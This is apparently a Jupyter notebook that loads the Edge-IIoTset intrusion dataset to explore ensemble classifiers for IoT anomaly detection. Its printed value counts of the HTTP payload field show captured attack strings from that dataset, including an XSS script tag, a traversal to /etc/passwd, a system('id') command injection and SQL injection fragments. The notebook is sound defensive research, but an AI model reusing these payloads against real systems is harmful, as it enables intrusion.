This jupyter notebook uses the Edge-IIoTset2023 public dataset (available at https://doi.org/10.1109/ACCESS.2022.3165809) to explore the use of Ensemble Learning methods as a means to improve predictive accuracy for anomaly detection.
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
import numpy as np
# Miscellaneous packages
import time #for calculating elapsed time for training tasks
import os #for checking if file exists
import socket #for getting FQDN of local machine
import math #square root function
import sys
# Packages from scikit-learn
import sklearn
from sklearn.model_selection import train_test_split
from sklearn.model_selection import GridSearchCV #for hyperparameter optimization
from sklearn.model_selection import cross_val_score #for cross fold validation
from sklearn.metrics import accuracy_score, confusion_matrix, classification_report, precision_score, recall_score, f1_score
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.neural_network import MLPClassifier
from sklearn.naive_bayes import GaussianNB, MultinomialNB, BernoulliNB
from sklearn.ensemble import BaggingClassifier, VotingClassifier, StackingClassifier, AdaBoostClassifier, GradientBoostingClassifier #Packages for Ensemble Learning
from sklearn.linear_model import LogisticRegression #used by stacking models
from sklearn.tree import DecisionTreeClassifier #used by stacking models
from imblearn.under_sampling import RandomUnderSampler #may need to install with: conda install -c conda-forge imbalanced-learn
from imblearn.over_sampling import SMOTE #may need to install with: conda install -c conda-forge imbalanced-learn
import xgboost as xgb #eXtreme Gradient Booster, not part of sklearn, need to install with: pip install xgboost
# function to show missing values in dataset
def get_type_missing(df):
df_types = pd.DataFrame()
df_types['data_type'] = df.dtypes
df_types['missing_values'] = df.isnull().sum()
return df_types.sort_values(by='missing_values', ascending=False)
# function to create a confusion matrix
def visualize_confusion_matrix(y_test_label, y_pred):
#
## Calculate accuracy
#accuracy = accuracy_score(y_test_label, y_pred)
#print("Accuracy:", accuracy)
#
# Confusion Matrix
cm = confusion_matrix(y_test_label, y_pred)
#
# visualize confusion matrix with more detailed labels
# https://medium.com/@dtuk81/confusion-matrix-visualization-fc31e3f30fea
#
group_names = ['True Negative','False Positive','False Negative','True Positive']
group_counts = ["{0:0.0f}".format(value) for value in cm.flatten()]
group_percentages = ["{0:.2%}".format(value) for value in cm.flatten()/np.sum(cm)]
labels = [f"{v1}\n{v2}\n{v3}" for v1, v2, v3 in zip(group_names,group_counts,group_percentages)]
labels = np.asarray(labels).reshape(2,2)
plt.figure(figsize=(3.5, 2.0)) #default figsize is 6.4" wide x 4.8" tall, shrink to 3.5" wide 2.0" tall
sns.heatmap(cm, annot=labels, fmt='', cmap='Blues', cbar=False)
plt.xlabel("Predicted Labels")
plt.ylabel("True Labels")
plt.title("Confusion Matrix")
plt.show()
# use the .ravel function to pull out TN,TP,FN,TP
# https://analytics4all.org/2020/05/07/python-confusion-matrix/
TN, FP, FN, TP = cm.ravel()
# calculate different metrics
Accuracy = (( TP + TN) / ( TP + TN + FP + FN))
Sensitivity = TP / (TP + FN)
Specificity = TN / (TN + FP)
GeometricMean = math.sqrt(Sensitivity * Specificity)
# Precision is the ratio of true positive predictions to the total number of positive predictions made by the model
# average=binary for binary classification models, average=micro for multiclass classification, average=weighted to match classification_report
precision = precision_score(y_test_label, y_pred, average='weighted')
# Recall is the ratio of true positive predictions to the total number of actual positive instances in the data.
# average=binary for binary classification models, average=micro for multiclass classification, average=weighted to match classification_report
recall = recall_score(y_test_label, y_pred, average='weighted')
# F1-score is a metric that considers both precision and recall, providing a balance between the two.
# average=binary for binary classification models, average=micro for multiclass classification, average=weighted to match classification_report
f1 = f1_score(y_test_label, y_pred, average='weighted')
# add details below graph to help interpret results
print('\n\n')
print('Confusion matrix\n\n', cm)
print('\nTrue Negatives (TN) = ', TN)
print('False Positives (FP) = ', FP)
print('False Negatives (FN) = ', FN)
print('True Positives (TP) = ', TP)
print ('\n')
print ("Accuracy: ", Accuracy)
print ("Sensitivity: ", Sensitivity)
print ("Specificity: ", Specificity)
print ("Geometric Mean: ", GeometricMean)
print ('\n')
print ("Precision: ", precision)
print ("Recall: ", recall)
print ("f1-score: ", f1)
print('\n------------------------------------------------\n')
# We want TN and TP to be approximately equal, because this indicates the dataset is well balanced.
# If TN and TP are very different, it indicates imbalanced data, which can lead to low accuracy due to overfitting
#if (TN/TP*100 < 40 or TN/TP*100 > 60): #we want TN and TP to be approximately 50%, if the values are below 40% or over 60%, generate a warning
# print("WARNING: the confusion matrix shows that TN and TP are very imbalanced, may lead to low accuracy!")
#
return cm
# function to report on model accuracy (TP, FP, FN, FP), precision, recall, f1-score
def model_classification_report(cm, y_test_label, y_pred):
report = classification_report(y_test_label, y_pred, digits=4)
print('\n')
print("Classification Report: \n", report)
print('\n\n\n')
# function to show elapsed time for running notebook
# start a timer so we can calculate the total runtime of this notebook
notebook_start_time = time.time() #seconds since epoch
def show_elapsed_time():
#
# Get the current time as a struct_time object
current_time_struct = time.localtime()
# Format the struct_time as a string (yyyy-mm-dd HH:MM:SS format)
current_time_str = time.strftime("%Y-%m-%d %H:%M:%S", current_time_struct)
# Display the current time in HH:MM:SS format
print("Current Time:", current_time_str)
# show a running total of elapsed time for the entire notebook
notebook_end_time = time.time() #seconds since epoch
print(f"The entire notebook runtime so far is {(notebook_end_time-notebook_start_time)/60:.0f} minutes")
show_elapsed_time()
Current Time: 2024-01-02 18:48:07 The entire notebook runtime so far is 0 minutes
# initialize variables to avoid undef errors
accuracy_lr_undersampled_unoptimized = 0
accuracy_lr_undersampled_optimized = 0
accuracy_dt_undersampled_unoptimized = 0
accuracy_dt_undersampled_optimized = 0
accuracy_ds_undersampled_unoptimized = 0
accuracy_ds_undersampled_optimized = 0
accuracy_rf_undersampled_unoptimized = 0
accuracy_rf_undersampled_optimized = 0
accuracy_nb_undersampled_unoptimized = 0
accuracy_nb_undersampled_optimized = 0
accuracy_svm_undersampled_unoptimized = 0
accuracy_svm_undersampled_optimized = 0
accuracy_knn_undersampled_unoptimized = 0
accuracy_knn_undersampled_optimized = 0
accuracy_mlp_undersampled_unoptimized = 0
accuracy_mlp_undersampled_optimized = 0
accuracy_gb_undersampled_unoptimized = 0
accuracy_gb_undersampled_optimized = 0
accuracy_xgb_undersampled_unoptimized = 0
accuracy_xgb_undersampled_optimized = 0
best_params_lr = ""
best_params_dt = ""
best_params_ds = ""
best_params_rf = ""
best_params_nb = ""
best_params_svm = ""
best_params_knn = ""
best_params_mlp = ""
best_params_gb = ""
best_params_xgb = ""
accuracy_ensemble_voting = 0
accuracy_ensemble_stacking = 0
accuracy_ensemble_boosting = 0
accuracy_ensemble_bagging = 0
cv_count = 10 #number of cross-validation folds
# define CSV source file
filename = 'DNN-EdgeIIoT-dataset.csv'
LAN_location = 'http://datasets.nyx.local:80/datasets/Edge-IIoTset2023/Selected_dataset_for_ML_and_DL' #high speed local copy on LAN
WAN_location = 'http://datasets.nyx.ca:8081/datasets/Edge-IIoTset2023/Selected_dataset_for_ML_and_DL' #accessible to entire internet
# Get the FQDN of the local machine
fqdn = socket.getfqdn()
ipv4_address = socket.gethostbyname(socket.gethostname())
print(f"Fully Qualified Domain Name (FQDN):{fqdn}, IPv4 address:{ipv4_address}")
if ( "nyx.local" in fqdn ):
# If inside the LAN, grab the local copy of the dataset
print(f"Detected Fully Qualified Domain Name of {fqdn}, dataset source is:\n{LAN_location}/{filename}")
dataset = f"{LAN_location}/{filename}"
else:
# If not inside the LAN, grab the dataset from an internet-accessible URL
print(f"Detected Fully Qualified Domain Name of {fqdn}, dataset source is:\n{WAN_location}/{filename}")
dataset = f"{WAN_location}/{filename}"
print(f"Loading dataset from {dataset}")
df = pd.read_csv(dataset)
Fully Qualified Domain Name (FQDN):DESKTOP-SNBGTFL.nyx.local, IPv4 address:192.168.14.136 Detected Fully Qualified Domain Name of DESKTOP-SNBGTFL.nyx.local, dataset source is: http://datasets.nyx.local:80/datasets/Edge-IIoTset2023/Selected_dataset_for_ML_and_DL/DNN-EdgeIIoT-dataset.csv Loading dataset from http://datasets.nyx.local:80/datasets/Edge-IIoTset2023/Selected_dataset_for_ML_and_DL/DNN-EdgeIIoT-dataset.csv
C:\Users\njeffrey\AppData\Local\Temp\ipykernel_8684\115976897.py:24: DtypeWarning: Columns (2,3,6,11,13,14,15,16,17,31,32,34,39,45,51,54,55) have mixed types. Specify dtype option on import or set low_memory=False. df = pd.read_csv(dataset)
print(f"Dropping rows from the dataset during debugging to speed up this notebook - turn this off when finished debugging!")
# cut dataset in half if > 2 million rows
if ( len(df) > 2000000):
print(f"Original size of dataset is", len(df), " rows")
df.drop(df.index[::2], inplace=True)
print(f"Dataset size after dropping all the even-numbered rows is", len(df), " rows")
# cut dataset in half if > 1 million rows
if ( len(df) > 1000000):
print(f"Original size of dataset is", len(df), " rows")
df.drop(df.index[::2], inplace=True)
print(f"Dataset size after dropping all the even-numbered rows is", len(df), " rows")
# cut dataset in half if > 0.5 million rows
if ( len(df) > 500000):
print(f"Original size of dataset is", len(df), " rows")
df.drop(df.index[::2], inplace=True)
print(f"Dataset size after dropping all the even-numbered rows is", len(df), " rows")
# cut dataset in half if > 0.5 million rows
if ( len(df) > 500000):
print(f"Original size of dataset is", len(df), " rows")
df.drop(df.index[::2], inplace=True)
print(f"Dataset size after dropping all the even-numbered rows is", len(df), " rows")
# cut dataset in half if > 250,000 rows
if ( len(df) > 250000):
print(f"Original size of dataset is", len(df), " rows")
df.drop(df.index[::2], inplace=True)
print(f"Dataset size after dropping all the even-numbered rows is", len(df), " rows")
# notebook runtime ~45 minutes with this many rows
# cut dataset in half if > 100,000 rows
if ( len(df) > 100000):
print(f"Original size of dataset is", len(df), " rows")
df.drop(df.index[::2], inplace=True)
print(f"Dataset size after dropping all the even-numbered rows is", len(df), " rows")
# notebook runtime ~13 minutes with this many rows
# cut dataset in half if > 50,000 rows
if ( len(df) > 50000):
print(f"Original size of dataset is", len(df), " rows")
df.drop(df.index[::2], inplace=True)
print(f"Dataset size after dropping all the even-numbered rows is", len(df), " rows")
# notebook runtime ~5 minutes with this many rows
# cut dataset in half if > 25,000 rows
if ( len(df) > 25000):
print(f"Original size of dataset is", len(df), " rows")
df.drop(df.index[::2], inplace=True)
print(f"Dataset size after dropping all the even-numbered rows is", len(df), " rows")
Dropping rows from the dataset during debugging to speed up this notebook - turn this off when finished debugging! Original size of dataset is 2219201 rows Dataset size after dropping all the even-numbered rows is 1109600 rows Original size of dataset is 1109600 rows Dataset size after dropping all the even-numbered rows is 554800 rows Original size of dataset is 554800 rows Dataset size after dropping all the even-numbered rows is 277400 rows Original size of dataset is 277400 rows Dataset size after dropping all the even-numbered rows is 138700 rows Original size of dataset is 138700 rows Dataset size after dropping all the even-numbered rows is 69350 rows Original size of dataset is 69350 rows Dataset size after dropping all the even-numbered rows is 34675 rows Original size of dataset is 34675 rows Dataset size after dropping all the even-numbered rows is 17337 rows
#view dimensions of dataset (rows and columns)
print ("Rows,columns in dataset:", df.shape)
Rows,columns in dataset: (17337, 63)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Current Time: 2024-01-02 18:51:18 The entire notebook runtime so far is 3 minutes
# take a quick look at the data
df.head()
| frame.time | ip.src_host | ip.dst_host | arp.dst.proto_ipv4 | arp.opcode | arp.hw.size | arp.src.proto_ipv4 | icmp.checksum | icmp.seq_le | icmp.transmit_timestamp | ... | mqtt.proto_len | mqtt.protoname | mqtt.topic | mqtt.topic_len | mqtt.ver | mbtcp.len | mbtcp.trans_id | mbtcp.unit_id | Attack_label | Attack_type | |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 127 | 2021 11:44:16.240051000 | 192.168.0.101 | 192.168.0.128 | 0 | 0.0 | 0.0 | 0 | 0.0 | 0.0 | 0.0 | ... | 0.0 | 0 | 0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0 | Normal |
| 255 | 2021 11:44:24.267046000 | 192.168.0.101 | 192.168.0.128 | 0 | 0.0 | 0.0 | 0 | 0.0 | 0.0 | 0.0 | ... | 0.0 | 0 | 0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0 | Normal |
| 383 | 2021 11:44:32.310917000 | 192.168.0.128 | 192.168.0.101 | 0 | 0.0 | 0.0 | 0 | 0.0 | 0.0 | 0.0 | ... | 0.0 | 0 | 0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0 | Normal |
| 511 | 2021 11:44:42.310422000 | 192.168.0.128 | 192.168.0.101 | 0 | 0.0 | 0.0 | 0 | 0.0 | 0.0 | 0.0 | ... | 0.0 | 0 | 0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0 | Normal |
| 639 | 2021 11:44:48.414713000 | 192.168.0.101 | 192.168.0.128 | 0 | 0.0 | 0.0 | 0 | 0.0 | 0.0 | 0.0 | ... | 0.0 | 0 | 0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0 | Normal |
5 rows × 63 columns
# Display all the data rather than just a portion
#pd.set_option('display.max_columns', None)
#pd.set_option('display.max_rows', None)
# check for any missing values in dataset
df.isna().sum()
frame.time 0
ip.src_host 0
ip.dst_host 0
arp.dst.proto_ipv4 0
arp.opcode 0
..
mbtcp.len 0
mbtcp.trans_id 0
mbtcp.unit_id 0
Attack_label 0
Attack_type 0
Length: 63, dtype: int64
# check for any missing datatypes
get_type_missing(df)
| data_type | missing_values | |
|---|---|---|
| frame.time | object | 0 |
| mqtt.conflags | float64 | 0 |
| tcp.srcport | object | 0 |
| udp.port | float64 | 0 |
| udp.stream | float64 | 0 |
| ... | ... | ... |
| tcp.connection.synack | float64 | 0 |
| tcp.dstport | float64 | 0 |
| tcp.flags | float64 | 0 |
| tcp.flags.ack | float64 | 0 |
| Attack_type | object | 0 |
63 rows × 2 columns
df.describe()
| arp.opcode | arp.hw.size | icmp.checksum | icmp.seq_le | icmp.transmit_timestamp | icmp.unused | http.content_length | http.response | http.tls_port | tcp.ack | ... | mqtt.len | mqtt.msg_decoded_as | mqtt.msgtype | mqtt.proto_len | mqtt.topic_len | mqtt.ver | mbtcp.len | mbtcp.trans_id | mbtcp.unit_id | Attack_label | |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| count | 17337.000000 | 17337.000000 | 17337.000000 | 17337.000000 | 1.733700e+04 | 17337.0 | 17337.000000 | 17337.000000 | 17337.0 | 1.733700e+04 | ... | 17337.000000 | 17337.0 | 17337.000000 | 17337.000000 | 17337.000000 | 17337.000000 | 17337.000000 | 17337.000000 | 17337.000000 | 17337.000000 |
| mean | 0.003057 | 0.014535 | 1734.763627 | 1927.268155 | 4.416502e+03 | 0.0 | 5.093442 | 0.014189 | 0.0 | 2.283297e+07 | ... | 2.041299 | 0.0 | 0.786699 | 0.152045 | 0.927496 | 0.152045 | 0.003115 | 0.013151 | 0.000115 | 0.271962 |
| std | 0.065703 | 0.294968 | 8501.298575 | 8962.836449 | 5.815210e+05 | 0.0 | 60.040038 | 0.118274 | 0.0 | 1.646465e+08 | ... | 7.761844 | 0.0 | 2.773099 | 0.764915 | 4.626110 | 0.764915 | 0.289987 | 1.227403 | 0.010740 | 0.444983 |
| min | 0.000000 | 0.000000 | 0.000000 | 0.000000 | 0.000000e+00 | 0.0 | 0.000000 | 0.000000 | 0.0 | 0.000000e+00 | ... | 0.000000 | 0.0 | 0.000000 | 0.000000 | 0.000000 | 0.000000 | 0.000000 | 0.000000 | 0.000000 | 0.000000 |
| 25% | 0.000000 | 0.000000 | 0.000000 | 0.000000 | 0.000000e+00 | 0.0 | 0.000000 | 0.000000 | 0.0 | 1.000000e+00 | ... | 0.000000 | 0.0 | 0.000000 | 0.000000 | 0.000000 | 0.000000 | 0.000000 | 0.000000 | 0.000000 | 0.000000 |
| 50% | 0.000000 | 0.000000 | 0.000000 | 0.000000 | 0.000000e+00 | 0.0 | 0.000000 | 0.000000 | 0.0 | 6.000000e+00 | ... | 0.000000 | 0.0 | 0.000000 | 0.000000 | 0.000000 | 0.000000 | 0.000000 | 0.000000 | 0.000000 | 0.000000 |
| 75% | 0.000000 | 0.000000 | 0.000000 | 0.000000 | 0.000000e+00 | 0.0 | 0.000000 | 0.000000 | 0.0 | 5.900000e+01 | ... | 0.000000 | 0.0 | 0.000000 | 0.000000 | 0.000000 | 0.000000 | 0.000000 | 0.000000 | 0.000000 | 1.000000 |
| max | 2.000000 | 6.000000 | 65373.000000 | 65511.000000 | 7.656889e+07 | 0.0 | 1465.000000 | 1.000000 | 0.0 | 2.139918e+09 | ... | 39.000000 | 0.0 | 14.000000 | 4.000000 | 24.000000 | 4.000000 | 27.000000 | 122.000000 | 1.000000 | 1.000000 |
8 rows × 43 columns
# look at all the datatypes of that are objects, in case any can be converted to integers
df.describe(include='object')
| frame.time | ip.src_host | ip.dst_host | arp.dst.proto_ipv4 | arp.src.proto_ipv4 | http.file_data | http.request.uri.query | http.request.method | http.referer | http.request.full_uri | http.request.version | tcp.options | tcp.payload | tcp.srcport | dns.qry.name.len | mqtt.conack.flags | mqtt.msg | mqtt.protoname | mqtt.topic | Attack_type | |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| count | 17337 | 17337 | 17337 | 17337 | 17337 | 17337.0 | 17337.0 | 17337.0 | 17337.0 | 17337.0 | 17337.0 | 17337 | 17337 | 17337.0 | 17337 | 17337 | 17337 | 17337 | 17337 | 17337 |
| unique | 17235 | 1076 | 437 | 8 | 8 | 42.0 | 87.0 | 6.0 | 5.0 | 195.0 | 5.0 | 2198 | 2315 | 6593.0 | 9 | 5 | 86 | 4 | 4 | 15 |
| top | 192.168.0.128 | 192.168.0.128 | 192.168.0.128 | 0 | 0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0 | 0 | 1883.0 | 0 | 0 | 0 | 0 | 0 | Normal |
| freq | 96 | 7541 | 7437 | 13165 | 12440 | 15545.0 | 16313.0 | 15033.0 | 16441.0 | 15033.0 | 15033.0 | 11485 | 10064 | 5135.0 | 15417 | 11945 | 11952 | 11963 | 11952 | 12622 |
# look at the values in all of the features
feature_names = df.columns.tolist()
for feature_name in feature_names:
if feature_name in df.columns:
print('\n')
print(f"------------------")
print(f"{feature_name}")
print(f"------------------")
print(df[feature_name].value_counts())
------------------
frame.time
------------------
192.168.0.128 96
0.0 5
6.0 4
2021 20:41:43.020677000 1
2021 20:41:51.125102000 1
..
2021 20:06:35.000076000 1
2021 20:06:37.010898000 1
2021 20:06:38.530847000 1
2021 20:06:39.914185000 1
2021 23:24:32.716408000 1
Name: frame.time, Length: 17235, dtype: int64
------------------
ip.src_host
------------------
192.168.0.128 7541
192.168.0.101 5206
0 2248
192.168.0.170 1253
0.0.0.0 15
...
2.220.180.106 1
101.60.160.172 1
103.40.97.143 1
10.220.141.250 1
95.77.69.81 1
Name: ip.src_host, Length: 1076, dtype: int64
------------------
ip.dst_host
------------------
192.168.0.128 7437
192.168.0.101 5175
0 2968
192.168.0.170 1161
0 128
...
123.92.118.251 1
154.146.31.202 1
206.127.250.27 1
242.199.230.120 1
116.164.7.227 1
Name: ip.dst_host, Length: 437, dtype: int64
------------------
arp.dst.proto_ipv4
------------------
0 13165
0 4025
192.168.0.128 107
192.168.0.147 10
192.168.0.1 9
0.0 9
192.168.0.129 8
192.168.0.170 4
Name: arp.dst.proto_ipv4, dtype: int64
------------------
arp.opcode
------------------
0.0 17295
1.0 31
2.0 11
Name: arp.opcode, dtype: int64
------------------
arp.hw.size
------------------
0.0 17295
6.0 42
Name: arp.hw.size, dtype: int64
------------------
arp.src.proto_ipv4
------------------
0 12440
0 4793
0.0 62
192.168.0.1 22
192.168.0.128 10
192.168.0.170 7
192.168.0.101 2
0.0.0.0 1
Name: arp.src.proto_ipv4, dtype: int64
------------------
icmp.checksum
------------------
0.0 16423
20837.0 2
5059.0 2
2988.0 2
38587.0 2
...
22786.0 1
6395.0 1
56563.0 1
34028.0 1
11607.0 1
Name: icmp.checksum, Length: 906, dtype: int64
------------------
icmp.seq_le
------------------
0.0 16329
29932.0 2
15642.0 2
19621.0 2
13725.0 2
...
54890.0 1
58315.0 1
62287.0 1
919.0 1
41347.0 1
Name: icmp.seq_le, Length: 1000, dtype: int64
------------------
icmp.transmit_timestamp
------------------
0.0 17336
76568891.0 1
Name: icmp.transmit_timestamp, dtype: int64
------------------
icmp.unused
------------------
0.0 17337
Name: icmp.unused, dtype: int64
------------------
http.file_data
------------------
0.0 15545
0 949
0.0 495
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.38 (Raspbian) Server at 192.168.0.128 Port 80</address>\n</body></html>\n 158
method=open+service%3a3%2e0%2e2%2e1105&service%5fname=%2f 60
<!--#include virtual="/index.jsp"--> 53
dir=/ 7
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>400 Bad Request</title>\n</head><body>\n<h1>Bad Request</h1>\n<p>Your browser sent a request that this server could not understand.<br />\n</p>\n<hr>\n<address>Apache/2.4.38 (Raspbian) Server at 127.0.1.1 Port 80</address>\n</body></html>\n 6
username=admin&password=00&Login=Login 6
<script>alert('XSS')</script>[]=PATH DISCLOSURE 6
; 6
username=admin&password=0&Login=Login 5
my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff 5
dump_sql=foo 4
button.login.home=Se%20connecter&Login.userAgent=0x4148_Fu&reload=0&SSLVPNUser.Password=0x4148Fu&SSLVPNUser.UserName=0x4148&thispage=../../../../../../etc/passwd%00 2
object=1;system('id'); 2
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>405 Method Not Allowed</title>\n</head><body>\n<h1>Method Not Allowed</h1>\n<p>The requested method TRACE is not allowed for this URL.</p>\n<hr>\n<address>Apache/2.4.38 (Raspbian) Server at 192.168.0.128 Port 80</address>\n</body></html>\n 2
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>408 Request Timeout</title>\n</head><body>\n<h1>Request Timeout</h1>\n<p>Server timeout waiting for the HTTP request from the client.</p>\n<hr>\n<address>Apache/2.4.38 (Raspbian) Server at 127.0.1.1 Port 80</address>\n</body></html>\n 2
<!DOCTYPE html>\r\n\r\n<html lang="en-GB">\r\n\r\n\t<head>\r\n\r\n\t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />\r\n\r\n\t\t<title>Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>\r\n\r\n\t\t<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />\r\n\r\n\t</head>\r\n\r\n\t<body>\r\n\r\n\t<div id="wrapper">\r\n\r\n\t<div id="header">\r\n\r\n\t<br />\r\n\r\n\t<p><img src="dvwa/images/login_logo.png" /></p>\r\n\r\n\t<br />\r\n\r\n\t</div> <!--<div id="header">-->\r\n\r\n\t<div id="content">\r\n\r\n\t<form action="login.php" method="post">\r\n\r\n\t<fieldset>\r\n\r\n\t\t\t<label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />\r\n\r\n\r\n\t\t\t<label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />\r\n\r\n\t\t\t<br />\r\n\r\n\t\t\t<p class="submit"><input type="submit" value="Login" name="Login"></p>\r\n\r\n\t</fieldset>\r\n\r\n\t<input type='hidden' name='user_token' value='36e778223ffa8793b45576ebe6c1d056' />\r\n\r\n\t</form>\r\n\r\n\t<br />\r\n\r\n\t\r\n\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\r\n\t<!-- <img src="dvwa/images/RandomStorm.png" /> -->\r\n\t</div > <!--<div id="content">-->\r\n\r\n\t<div id="footer">\r\n\r\n\t<p><a href="https://github.com/digininja/DVWA/" target="_blank">Damn Vulnerable Web Application (DVWA)</a></p>\r\n\r\n\t</div> <!--<div id="footer"> -->\r\n\r\n\t</div> <!--<div id="wrapper"> -->\r\n\r\n\t</body>\r\n\r\n</html> 1
<!DOCTYPE html>\r\n\r\n<html lang="en-GB">\r\n\r\n\t<head>\r\n\r\n\t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />\r\n\r\n\t\t<title>Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>\r\n\r\n\t\t<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />\r\n\r\n\t</head>\r\n\r\n\t<body>\r\n\r\n\t<div id="wrapper">\r\n\r\n\t<div id="header">\r\n\r\n\t<br />\r\n\r\n\t<p><img src="dvwa/images/login_logo.png" /></p>\r\n\r\n\t<br />\r\n\r\n\t</div> <!--<div id="header">-->\r\n\r\n\t<div id="content">\r\n\r\n\t<form action="login.php" method="post">\r\n\r\n\t<fieldset>\r\n\r\n\t\t\t<label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />\r\n\r\n\r\n\t\t\t<label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />\r\n\r\n\t\t\t<br />\r\n\r\n\t\t\t<p class="submit"><input type="submit" value="Login" name="Login"></p>\r\n\r\n\t</fieldset>\r\n\r\n\t<input type='hidden' name='user_token' value='c5f24dda945a03c22761bdd14bda50ac' />\r\n\r\n\t</form>\r\n\r\n\t<br />\r\n\r\n\t\r\n\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\r\n\t<!-- <img src="dvwa/images/RandomStorm.png" /> -->\r\n\t</div > <!--<div id="content">-->\r\n\r\n\t<div id="footer">\r\n\r\n\t<p><a href="https://github.com/digininja/DVWA/" target="_blank">Damn Vulnerable Web Application (DVWA)</a></p>\r\n\r\n\t</div> <!--<div id="footer"> -->\r\n\r\n\t</div> <!--<div id="wrapper"> -->\r\n\r\n\t</body>\r\n\r\n</html> 1
<!DOCTYPE html>\r\n\r\n<html lang="en-GB">\r\n\r\n\t<head>\r\n\r\n\t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />\r\n\r\n\t\t<title>Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>\r\n\r\n\t\t<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />\r\n\r\n\t</head>\r\n\r\n\t<body>\r\n\r\n\t<div id="wrapper">\r\n\r\n\t<div id="header">\r\n\r\n\t<br />\r\n\r\n\t<p><img src="dvwa/images/login_logo.png" /></p>\r\n\r\n\t<br />\r\n\r\n\t</div> <!--<div id="header">-->\r\n\r\n\t<div id="content">\r\n\r\n\t<form action="login.php" method="post">\r\n\r\n\t<fieldset>\r\n\r\n\t\t\t<label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />\r\n\r\n\r\n\t\t\t<label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />\r\n\r\n\t\t\t<br />\r\n\r\n\t\t\t<p class="submit"><input type="submit" value="Login" name="Login"></p>\r\n\r\n\t</fieldset>\r\n\r\n\t<input type='hidden' name='user_token' value='9ad0c400d4168f6f5479775d34bf0aa1' />\r\n\r\n\t</form>\r\n\r\n\t<br />\r\n\r\n\t<div class="message">CSRF token is incorrect</div>\r\n\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\r\n\t<!-- <img src="dvwa/images/RandomStorm.png" /> -->\r\n\t</div > <!--<div id="content">-->\r\n\r\n\t<div id="footer">\r\n\r\n\t<p><a href="https://github.com/digininja/DVWA/" target="_blank">Damn Vulnerable Web Application (DVWA)</a></p>\r\n\r\n\t</div> <!--<div id="footer"> -->\r\n\r\n\t</div> <!--<div id="wrapper"> -->\r\n\r\n\t</body>\r\n\r\n</html> 1
<!DOCTYPE html>\r\n\r\n<html lang="en-GB">\r\n\r\n\t<head>\r\n\r\n\t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />\r\n\r\n\t\t<title>Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>\r\n\r\n\t\t<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />\r\n\r\n\t</head>\r\n\r\n\t<body>\r\n\r\n\t<div id="wrapper">\r\n\r\n\t<div id="header">\r\n\r\n\t<br />\r\n\r\n\t<p><img src="dvwa/images/login_logo.png" /></p>\r\n\r\n\t<br />\r\n\r\n\t</div> <!--<div id="header">-->\r\n\r\n\t<div id="content">\r\n\r\n\t<form action="login.php" method="post">\r\n\r\n\t<fieldset>\r\n\r\n\t\t\t<label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />\r\n\r\n\r\n\t\t\t<label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />\r\n\r\n\t\t\t<br />\r\n\r\n\t\t\t<p class="submit"><input type="submit" value="Login" name="Login"></p>\r\n\r\n\t</fieldset>\r\n\r\n\t<input type='hidden' name='user_token' value='2d63837e1d43f194e1bcb818a0312f86' />\r\n\r\n\t</form>\r\n\r\n\t<br />\r\n\r\n\t<div class="message">CSRF token is incorrect</div>\r\n\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\r\n\t<!-- <img src="dvwa/images/RandomStorm.png" /> -->\r\n\t</div > <!--<div id="content">-->\r\n\r\n\t<div 